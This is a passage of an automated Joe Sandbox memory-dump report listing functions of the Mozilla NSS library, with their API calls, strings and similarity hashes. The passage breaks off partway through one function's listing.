Part of subcall function 6C7309E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C7306A2,00000000,?), ref: 6C7309F8
Part of subcall function 6C7309E0: malloc.MOZGLUE(0000001F), ref: 6C730A18
Part of subcall function 6C7309E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C730A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C7578F8), ref: 6C794ED9

Part of subcall function 6C785920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C787703,?,00000000,00000000), ref: 6C785942
Part of subcall function 6C785920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C787703), ref: 6C785954
Part of subcall function 6C785920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C78596A
Part of subcall function 6C785920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C785984
Part of subcall function 6C785920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C785999
Part of subcall function 6C785920: free.MOZGLUE(00000000), ref: 6C7859BA
Part of subcall function 6C785920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C7859D3
Part of subcall function 6C785920: free.MOZGLUE(00000000), ref: 6C7859F5
Part of subcall function 6C785920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C785A0A
Part of subcall function 6C785920: free.MOZGLUE(00000000), ref: 6C785A2E
Part of subcall function 6C785920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C785A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C7578F8), ref: 6C794EB3

Part of subcall function 6C794820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C794EB8,?,?,?,?,?,?,?,?,?,?,6C7578F8), ref: 6C79484C
Part of subcall function 6C794820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C794EB8,?,?,?,?,?,?,?,?,?,?,6C7578F8), ref: 6C79486D
Part of subcall function 6C794820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C794EB8,?), ref: 6C794884

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C7578F8), ref: 6C794EC0

Part of subcall function 6C794470: TlsGetValue.KERNEL32(00000000,?,6C757296,00000000), ref: 6C794487
Part of subcall function 6C794470: EnterCriticalSection.KERNEL32(?,?,?,6C757296,00000000), ref: 6C7944A0
Part of subcall function 6C794470: PR_Unlock.NSS3(?,?,?,?,6C757296,00000000), ref: 6C7944BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C7578F8), ref: 6C794F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C7578F8), ref: 6C794F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C7578F8), ref: 6C794F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C7578F8), ref: 6C794F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7578F8), ref: 6C794F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7578F8), ref: 6C794F8F
PK11_UpdateSlotAttribute.NSS3(?,6C86DCB0,00000000), ref: 6C794FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6C79501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C7578F8), ref: 6C79506B

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: 2ade1604b3b1c27e3c601171c7235b0ed09e84dd2969bc6497d376d1d41117e2
Instruction ID: 3d297321778610d59c24c09989e427a3f396c8259d52d591c458c23f2dee9607
Opcode Fuzzy Hash: 2ade1604b3b1c27e3c601171c7235b0ed09e84dd2969bc6497d376d1d41117e2
Instruction Fuzzy Hash: 0A51F4B1A016019FEB219F39FE09A9B36B5BF0531DF180635EC1A86B12F731D925C6D2

Function 6C85ABB0 Relevance: 19.7, APIs: 13, Instructions: 173COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C85ABD5
_PR_MD_UNLOCK.NSS3(?), ref: 6C85AC21

Part of subcall function 6C8070F0: LeaveCriticalSection.KERNEL32(6C850C7B), ref: 6C80710D

EnterCriticalSection.KERNEL32(?), ref: 6C85AC44
_PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6C85AC6E
_PR_MD_UNLOCK.NSS3(?), ref: 6C85AC97
EnterCriticalSection.KERNEL32(?), ref: 6C85ACBF
PR_NewCondVar.NSS3(?), ref: 6C85ACDB
_PR_MD_UNLOCK.NSS3(?), ref: 6C85AD0D
PR_SetPollableEvent.NSS3(?), ref: 6C85AD18
EnterCriticalSection.KERNEL32(?), ref: 6C85AD31

Part of subcall function 6C809890: TlsGetValue.KERNEL32(?,?,?,6C8097EB), ref: 6C80989E

_PR_MD_UNLOCK.NSS3(?), ref: 6C85AD89
PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C85AD98
_PR_MD_UNLOCK.NSS3(?), ref: 6C85ADC5

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalSection$Enter$CondErrorEventLeavePollableValue
String ID:
API String ID: 829741924-0
Opcode ID: d4e309a0fccdf00df75baf5e96a09c434393e48087690337d703929a9c748db3
Instruction ID: c646e1e328ec6542e637e39864f9b8c8244af1923f2b42bfba6fb5f7e6e78b89
Opcode Fuzzy Hash: d4e309a0fccdf00df75baf5e96a09c434393e48087690337d703929a9c748db3
Instruction Fuzzy Hash: 2F61BEB29006109FC770AF19CA84796B7F4BF4431EF298A39D85957B12E771F858CB90

Function 6C73ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C73ACE2
malloc.MOZGLUE(00000001), ref: 6C73ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C73AD02
TlsGetValue.KERNEL32 ref: 6C73AD3C
calloc.MOZGLUE(00000001,?), ref: 6C73AD8C
PR_Unlock.NSS3 ref: 6C73ADC0
free.MOZGLUE(00000000), ref: 6C73AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C73AE58
free.MOZGLUE(00000000), ref: 6C73AE69
free.MOZGLUE(?), ref: 6C73AE78
PR_Unlock.NSS3 ref: 6C73AE8C
free.MOZGLUE(?), ref: 6C73AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C73AEC7

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: 09796e48ecb29374cba26ba9c1180f5b7a193a724fba9882faad7b3c53b795fe
Instruction ID: 7136b207d8fe5b2e5a5e63b642bb5b3484587a7b0fb45c8e760e9d88e0e916b0
Opcode Fuzzy Hash: 09796e48ecb29374cba26ba9c1180f5b7a193a724fba9882faad7b3c53b795fe
Instruction Fuzzy Hash: 1951BEB1E40225CBDF21DFE8DA476AEB7B8AB0635DF040035D808A3B52D331A954CBD6

Function 6C780FE0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 192memorystringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C781057
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C781085
PK11_GetAllTokens.NSS3 ref: 6C7810B1
free.MOZGLUE(?), ref: 6C781107
PR_SetError.NSS3(00000000,00000000), ref: 6C781172
free.MOZGLUE(?), ref: 6C781182
free.MOZGLUE(?), ref: 6C7811A6
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C7811C5

Part of subcall function 6C7852C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6C75EAC5,00000001), ref: 6C7852DF
Part of subcall function 6C7852C0: EnterCriticalSection.KERNEL32(?), ref: 6C7852F3
Part of subcall function 6C7852C0: PR_Unlock.NSS3(?), ref: 6C785358

PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C7811D3
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C7811F3

Strings

/G6/, xrefs: 6C780FEC

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
String ID: /G6/
API String ID: 1549229083-570549270
Opcode ID: 4597044f0f1ff786aad690404625ffee93410d6e77200ea229b78408212de6ec
Instruction ID: a66408b092fa943d2a6304430d85fc6e23202b971666e47fe20db7f7542f5c1f
Opcode Fuzzy Hash: 4597044f0f1ff786aad690404625ffee93410d6e77200ea229b78408212de6ec
Instruction Fuzzy Hash: 326195B0E023459BEB00DF65DE85BAAB7B5BF04348F144138EE29AB741EB31D944CB91

Function 6C784A20 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 182COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,?), ref: 6C784A4B
PK11_GetInternalSlot.NSS3 ref: 6C784A59
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C784AC6
TlsGetValue.KERNEL32 ref: 6C784B17
EnterCriticalSection.KERNEL32(?), ref: 6C784B2B
PR_Unlock.NSS3(?), ref: 6C784B77
PK11_FreeSymKey.NSS3(?), ref: 6C784B87
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C784B9A
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C784BA9
PR_SetError.NSS3(00000000,00000000), ref: 6C784BC1

Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307AD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307CD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307D6
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6C204A), ref: 6C7307E4
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,6C6C204A), ref: 6C730864
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C730880
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,6C6C204A), ref: 6C7308CB
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308D7
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308FB

Strings

/G6/, xrefs: 6C784A32

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Value$K11_$DestroyPrivatecalloc$CriticalDoesEnterErrorFreeInternalItem_MechanismSectionSlotUnlockUtilZfree
String ID: /G6/
API String ID: 3936029921-570549270
Opcode ID: 037d128bea4d6c8be151e4a88e3df28b09c939ae0c862acda0128d3b4ea23b93
Instruction ID: de028a23a75212d83b3f1810dceb72849d2dff2df3eb7dce5eda957f05f99293
Opcode Fuzzy Hash: 037d128bea4d6c8be151e4a88e3df28b09c939ae0c862acda0128d3b4ea23b93
Instruction Fuzzy Hash: 31519FB5E012099BDB00DFA9DE49AAFB7F9AF48318F144039E905A7701E775ED10CBA1

Function 6C814C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6C814CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C814CFD
sqlite3_value_text16.NSS3(?), ref: 6C814D44

Strings

invalid, xrefs: 6C814CF1
bad parameter or other API misuse, xrefs: 6C814D05
out of memory, xrefs: 6C814C78, 6C814C9E
API call with %s database connection pointer, xrefs: 6C814CF6
no more rows available, xrefs: 6C814D2E
unknown error, xrefs: 6C814D56
abort due to ROLLBACK, xrefs: 6C814D27, 6C814D33
another row available, xrefs: 6C814D20

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: 0523f1111d740a9aad7f32cebf43e5b575193580cdf4fb582ef87b5aaf7ca5bf
Instruction ID: d5504a890fb57eb277c9b29d5e6ec36f23fb0793b0e0ef3801d12d568f517cb0
Opcode Fuzzy Hash: 0523f1111d740a9aad7f32cebf43e5b575193580cdf4fb582ef87b5aaf7ca5bf
Instruction Fuzzy Hash: EA3177B2A0C813A7EB340A24AB007A973E277C231DF560D35C4284BF15DB75AC5587E2

Function 6C764E50 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C764E90
EnterCriticalSection.KERNEL32 ref: 6C764EA9
TlsGetValue.KERNEL32 ref: 6C764EC6
EnterCriticalSection.KERNEL32 ref: 6C764EDF
PL_HashTableLookup.NSS3 ref: 6C764EF8
PR_Unlock.NSS3 ref: 6C764F05
PR_Now.NSS3 ref: 6C764F13
PR_Unlock.NSS3 ref: 6C764F3A

Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307AD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307CD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307D6
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6C204A), ref: 6C7307E4
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,6C6C204A), ref: 6C730864
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C730880
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,6C6C204A), ref: 6C7308CB
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308D7
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308FB

Strings

bUvl, xrefs: 6C764F3F
/G6/, xrefs: 6C764E62
bUvl, xrefs: 6C764E5C

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID: /G6/$bUvl$bUvl
API String ID: 326028414-293279003
Opcode ID: 74176219e3fe717eefdfbef6f141e6bd8343c53fe820cc34d7e9ce66be4707d7
Instruction ID: e4037d5a020c96d20a4a808c8293d0cb712409d59975e556188c8246bf97960f
Opcode Fuzzy Hash: 74176219e3fe717eefdfbef6f141e6bd8343c53fe820cc34d7e9ce66be4707d7
Instruction Fuzzy Hash: 764149B4A00605DFCB10EF79C5888AABBF0FF49308B058569EC499B711EB30E895CBD1

Function 6C78ECE0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C78DE64), ref: 6C78ED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C78ED22

Part of subcall function 6C79B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8718D0,?), ref: 6C79B095

PL_FreeArenaPool.NSS3(?), ref: 6C78ED4A
PL_FinishArenaPool.NSS3(?), ref: 6C78ED6B
PR_CallOnce.NSS3(6C8A2AA4,6C7A12D0), ref: 6C78ED38

Part of subcall function 6C6C4C70: TlsGetValue.KERNEL32(?,?,?,6C6C3921,6C8A14E4,6C80CC70), ref: 6C6C4C97
Part of subcall function 6C6C4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C6C3921,6C8A14E4,6C80CC70), ref: 6C6C4CB0
Part of subcall function 6C6C4C70: PR_Unlock.NSS3(?,?,?,?,?,6C6C3921,6C8A14E4,6C80CC70), ref: 6C6C4CC9

SECOID_FindOID_Util.NSS3(?), ref: 6C78ED52
PR_CallOnce.NSS3(6C8A2AA4,6C7A12D0), ref: 6C78ED83
PL_FreeArenaPool.NSS3(?), ref: 6C78ED95
PL_FinishArenaPool.NSS3(?), ref: 6C78ED9D

Part of subcall function 6C7A64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C7A127C,00000000,00000000,00000000), ref: 6C7A650E

Strings

security, xrefs: 6C78ED06
/G6/, xrefs: 6C78ECEB

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: /G6/$security
API String ID: 3323615905-2919133760
Opcode ID: 084c680fb03306f7e18d020db216f8a27cfbbc2d2865d7e1bbb97f4bd9857bc3
Instruction ID: 755a61c02634f1a564af3ec46dd7d162bde5cb47d755508466200c4a730bf25a
Opcode Fuzzy Hash: 084c680fb03306f7e18d020db216f8a27cfbbc2d2865d7e1bbb97f4bd9857bc3
Instruction Fuzzy Hash: 6A11307AA012086BE73057A5AE49BBF7274AF0260CF044934E92562F41F724A70DD6F7

Function 6C744880 Relevance: 18.2, APIs: 12, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7448A2
PORT_NewArena_Util.NSS3(00000800), ref: 6C7448C4
PORT_ArenaAlloc_Util.NSS3(?,000000BC), ref: 6C7448D8
memset.VCRUNTIME140(00000004,00000000,000000B8), ref: 6C7448FB
PORT_ArenaAlloc_Util.NSS3(?,00000018), ref: 6C744908
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C744947
SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C74496C
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C744988
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C868DAC,?), ref: 6C7449DE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7449FD
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C744ACB

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Alloc_ArenaError$Arena_Item_$CopyDecodeFreeQuickmemset
String ID:
API String ID: 4201528089-0
Opcode ID: 7d649a9928a0363e95b425e728e3b5c5b3581698440d6d3380bcae30eee24dbf
Instruction ID: 8344cfc9fcf7f7c5928bfa33d84d19e80b98cfa1c69c823d54a25acd05ab7301
Opcode Fuzzy Hash: 7d649a9928a0363e95b425e728e3b5c5b3581698440d6d3380bcae30eee24dbf
Instruction Fuzzy Hash: D351F3B1A003018BEB108F65DE4979B7AE8BF4130CF14C539E929ABB81E771D418FB56

Function 6C6C4C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C6C3921,6C8A14E4,6C80CC70), ref: 6C6C4C97
EnterCriticalSection.KERNEL32(?,?,?,?,6C6C3921,6C8A14E4,6C80CC70), ref: 6C6C4CB0
PR_Unlock.NSS3(?,?,?,?,?,6C6C3921,6C8A14E4,6C80CC70), ref: 6C6C4CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6C6C3921,6C8A14E4,6C80CC70), ref: 6C6C4D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C6C3921,6C8A14E4,6C80CC70), ref: 6C6C4D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C6C3921,6C8A14E4,6C80CC70), ref: 6C6C4D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C6C3921,6C8A14E4,6C80CC70), ref: 6C6C4D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C6C3921,6C8A14E4,6C80CC70), ref: 6C6C4D97
PR_Lock.NSS3(?,?,?,?,?,6C6C3921,6C8A14E4,6C80CC70), ref: 6C6C4DBA
PR_WaitCondVar.NSS3 ref: 6C6C4DD4
PR_Unlock.NSS3(?,?,?,?,?,6C6C3921,6C8A14E4,6C80CC70), ref: 6C6C4DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C6C3921,6C8A14E4,6C80CC70), ref: 6C6C4DEF

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: c21491a6d7178ef10f0afffd74ed701a9b90b90e5f3b30a0daca626f162ca824
Instruction ID: 81b105a8f7181bcec5e1ca68a7bc63300ea9e48dd386debf1302763eda45db10
Opcode Fuzzy Hash: c21491a6d7178ef10f0afffd74ed701a9b90b90e5f3b30a0daca626f162ca824
Instruction Fuzzy Hash: CD412AB5A08A15CFCB20EFB9D5885697BF4FB05318B054669D888D7711EB70E884CBC6

Function 6C78CC70 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6C78CD08
PK11_DoesMechanism.NSS3(?,?), ref: 6C78CE16
PR_SetError.NSS3(00000000,00000000), ref: 6C78D079

